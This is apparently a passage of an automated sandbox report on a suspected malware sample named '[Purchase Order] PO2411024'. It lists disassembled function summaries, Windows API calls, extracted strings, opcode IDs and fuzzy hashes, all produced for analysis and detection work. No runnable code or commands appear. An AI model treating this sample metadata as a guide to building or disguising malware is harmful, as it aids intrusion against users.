                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 2783949968-0
                                                    • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                    • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                    • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                    • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                    • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                    • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                    • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                    • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                    • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                    • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                      • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                      • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                    • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                    • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                    • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00472B63
                                                    • GetDC.USER32(00000000), ref: 00472B6C
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                    • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                    • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                    • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                    • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00472BB2
                                                    • GetDC.USER32(00000000), ref: 00472BBB
                                                    • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                    • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                    • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                    • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                    • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                    APIs
                                                    • __getptd_noexit.LIBCMT ref: 00415150
                                                      • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                      • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                      • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                      • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                      • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                    • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                    • __freeptd.LIBCMT ref: 0041516B
                                                    • ExitThread.KERNEL32 ref: 00415173
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1454798553-0
                                                    • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                    • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                    • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                    • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _strncmp
                                                    • String ID: Q\E
                                                    • API String ID: 909875538-2189900498
                                                    • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                    • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                    • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                    • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                    APIs
                                                    • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                    • String ID: AutoIt3GUI$Container
                                                    • API String ID: 2652923123-3941886329
                                                    • Opcode ID: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
                                                    • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                    • Opcode Fuzzy Hash: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
                                                    • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strncmp
                                                    • String ID: U$\
                                                    • API String ID: 2666721431-100911408
                                                    • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                    • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                    • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                    • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                    APIs
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • __wcsnicmp.LIBCMT ref: 00467288
                                                    • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                    • String ID: LPT
                                                    • API String ID: 3035604524-1350329615
                                                    • Opcode ID: c89a6902ae3c489812dfd4cd3013f30facd726ae010de6d7796aa9639e79a976
                                                    • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                    • Opcode Fuzzy Hash: c89a6902ae3c489812dfd4cd3013f30facd726ae010de6d7796aa9639e79a976
                                                    • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \$h
                                                    • API String ID: 4104443479-677774858
                                                    • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                    • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                    • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                    • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID: &
                                                    • API String ID: 2931989736-1010288
                                                    • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                    • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                    • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                    • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                    • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                    • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                    • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00466825
                                                    • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_wcslen
                                                    • String ID: |
                                                    • API String ID: 596671847-2343686810
                                                    • Opcode ID: 7cb74d60865eca5b28057979f277cd03318605ef9fe3268a007aa21ef86e616b
                                                    • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                    • Opcode Fuzzy Hash: 7cb74d60865eca5b28057979f277cd03318605ef9fe3268a007aa21ef86e616b
                                                    • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                    APIs
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                    • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                    • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                    • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                    APIs
                                                    • _strlen.LIBCMT ref: 0040F858
                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                    • _sprintf.LIBCMT ref: 0040F9AE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_sprintf_strlen
                                                    • String ID: %02X
                                                    • API String ID: 1921645428-436463671
                                                    • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
